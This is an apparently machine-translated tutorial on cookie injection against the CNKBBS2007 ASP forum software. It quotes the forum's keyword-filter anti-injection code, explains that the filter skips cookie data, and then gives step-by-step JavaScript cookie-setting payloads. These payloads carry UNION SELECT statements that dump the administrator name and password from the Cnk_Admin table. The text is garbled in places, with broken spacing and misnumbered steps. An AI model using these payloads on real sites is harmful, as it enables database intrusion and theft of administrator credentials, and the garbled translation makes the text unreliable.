Classic COOKIE injection Principle

 

Hello everyone, I am a beginner. In the previous lecture, we learned about "Search injection, today, let's take a look at another uncommon injection method, "cookie injection". Before we talk about it, let's review the Request object knowledge in ASP scripts, in the previous sections, we have mentioned that the common GET and POST methods are used to obtain data from the Request object client. At the same time, the request object can obtain data without using a set, you can directly use "request (" name ")", but it is inefficient and error-prone. When we omit a specific set name, ASP presses QueryString, from, cookie, servervariable, in the order of the Set, cookies are integrated in the request object members, which means that "All cookie values sent by the user system are read, from the second lecture on "Cookie spoofing intrusion and Principles", we know that cookies are a text file stored on the client computer and can be modified so that we can use Request. cookie method to submit the value of the variable, so as to exploit the system vulnerability for injection attacks.

 

First of all, let's take a look at the latest version of the network scene Forum "(CNKBBS2007) network scene Forum 2007v5. 0" official "http://www.cnetking.com/websys2.asp? Id = 26 "the release date is. After opening the source code of the system, the following code is displayed in the" user_RxMsg_detail.asp "file:

 

(Call the opendb. asp file)

 

(Call the fzr. asp file)

 

..................

 

Now it is the file connecting to the database, where the fzr. asp file is called, and we open the fzr. asp file.

 

<%

 

'-------- Copyright description ------------------

 

'SQL general anti-injection program

 

'Aseanleung

 

'-------- Definition section ------------------

 

Dim Fy_Post, Fy_Get, Fy_In, Fy_Inf, Fy_Xh, Fy_db, Fy_dbstr

 

Dim fso1, all_tree2, file1, files, filez, fs1, zruserip

 

If Request. QueryString <> "" Then (judge the data submitted by Request. QueryString (the customer uses the GET method), and does not specify the data submitted by other methods)

 

'Custom string to be filtered, separated by '|'

 

Fy_In = "'|; | % | * | and | exec | insert | select | delete | update | count | chr | mid | master | truncate | char | declare | script "(blocking common SQL Injection statement)

 

Fy_Inf = split (Fy_In, "| ")

 

For Each Fy_Get In Request. QueryString

 

For Fy_Xh = 0 To Ubound (Fy_Inf)

 

If Instr (LCase (Request. QueryString (Fy_Get), Fy_Inf (Fy_Xh) <> 0 Then

 

Zruserip = Request. ServerVariables ("HTTP_X_FORWARDED_FOR ")

 

If zruserip = "" Then zruserip = Request. ServerVariables ("REMOTE_ADDR ")

 

Response. Write "content contains invalid characters! Please do not include ', and, or, and so on. Please remove these characters and send them again !!

"

 

Response. Write "if you want to attack a website, the system records your operations

"

 

Response. Write "Operation IP:" & zruserip &"

"

 

Response. Write "operation time:" & Now &"

"

 

Response. Write "Operation page:" & Request. ServerVariables ("URL ")&"

"

 

Response. Write "submission method: GET

"

 

Response. Write "Submit parameters:" & Fy_Get &"

"

 

Response. Write "submit data:" & Request. QueryString (Fy_Get)

 

......................

 

Obviously, it is an SQL universal anti-injection program file (the above red letter is an explanation of the Code)

 

After reading the code, let's sort out the following ideas: due to a programmer's error, IDs are not filtered and then queried in SQL statements. This is the cause of the injection vulnerability, although the program introduced anti-injection programs to prevent the use of common SQL statements, it only judges the data submitted by the customer using the GET method, but does not judge the data submitted by other methods, as a result, the customer can use the Request. cookie method to submit the value of the variable, and bypass the SQL anti-injection program (Summary: cookie injection conditions: the system directly uses "request (" name ") "Get the data submitted by the customer, and do not filter the variables submitted by the customer, and there is no restriction on the Request in the anti-injection program. cookie. Currently, anti-injection program 3.0 only restricts the use of GET and POST submission methods ).

 

Let's learn about coolie injection statements.

 

Cookie injection statement: javascript: alert (document. cookie = "id =" + escape ("this is asp? Id = the value xx represents AFTER xx) and (injection attack code here )"));

 

The knowledge of the javascript language is used here. I break down the meaning of this statement as follows for your understanding:

 

1: The alert () method of the "alert ()" display information dialog box. It generates an independent small window called a dialog box to display a message and a button. (This is often used across sites)

 

2: "document. cookie "when processing a cookie, javascript saves it as an attribute of the document Object. Its attribute name is cookie. With this attribute, we can create and read cookie data, in the program, you can use: "alert (document. cookie) "umument (document) object indicates the HTML (output data to the page) displayed in the browser. The cookie attribute is a cookie that allows reading and writing HTTP; string type

 

4: escape () function. It converts all non-letter characters in a string into equivalent strings represented by letters and numbers and has the function of encoding strings. in general, the cookie is usually sent to the browser by the server program through HTTP request and response hair, but with javascript, you can set the cookie in the local browser

 

Format: the attribute of name = value is the name of the specified cookie data item. value is the value corresponding to the name. It is a string and can contain a series of characters, name and value cannot contain semicolons, commas, and white spaces. (50 "and 1 = 1") There are semicolons, commas, and white spaces. Therefore, we need to use the escape () function to encode them.

 

You can understand the meaning of the entire sentence above, that is, to set the value of the cookie data item currently created for calling. When setting the cookie, they are first saved in the browser's memory. When exiting the browser, to be written to the hard disk. (This is why the link address is entered after exiting in the following operations)

 

Finally, let's test the procedure:

 

1: Open the chinnet forum set up on the local host: register a user, we will receive a short message from the Administrator, we open the short message Link (note the parameter id here)

 

2: Clear the browser URL and enter "javascript: alert (document. cookie = "id =" + escape ("corresponding parameter id value and 1 = 1"); a box will pop up later,

 

3: Again input: http://www.bkjia.com/cnkbbs5.2 _ ac/user_RxMsg_detail.asp? Username = forum administrator (the normal page is returned, indicating that the SQL anti-injection program is bypassed)

 

3: Enter javascript: alert (document. cookie = "id =" + escape ("1 and 1 = 2"); then enter: http://www.bkjia.com/cnkbbs5.2 _ ac/user_RxMsg_detail.asp? Username = forum administrator (the time and content are not displayed, which means we can inject it)

 

4: You can view the system database and find that the cnk_users_RxMsg table contains eight fields. The Cnk_Admin table stores administrator information. The AdminName and AdminPassword fields correspond to the account and password respectively, we use the joint query statement, and then enter: javascript: alert (document. cookie = "id =" + escape ("1 and 1 = 2 union select 1, 2, 3, 4, 5, 6, 7, 8 from Cnk_Admin") and then empty the address bar, enter the http://www.bkjia.com/cnkbbs5.2 _ ac/user_RxMsg_detail.asp. The numbers 4 and 5 are displayed.

 

5: Clear the address bar again and enter javascript: alert (document. cookie = "id =" + escape ("1 and 1 = 2 union select 1, 2, 3, AdminName, AdminPassword, 6, 7, 8 from Cnk_Admin"). After submission, clear the address bar, input: http://www.bkjia.com/cnkbbs5.2 _ ac/user_RxMsg_detail.asp? Username = forum administrator, so we can see the Administrator's password and account on the page.

 

Another article: how to generate Cookie injection written by AD: http://www.bkjia.com/article/200803/24734.html,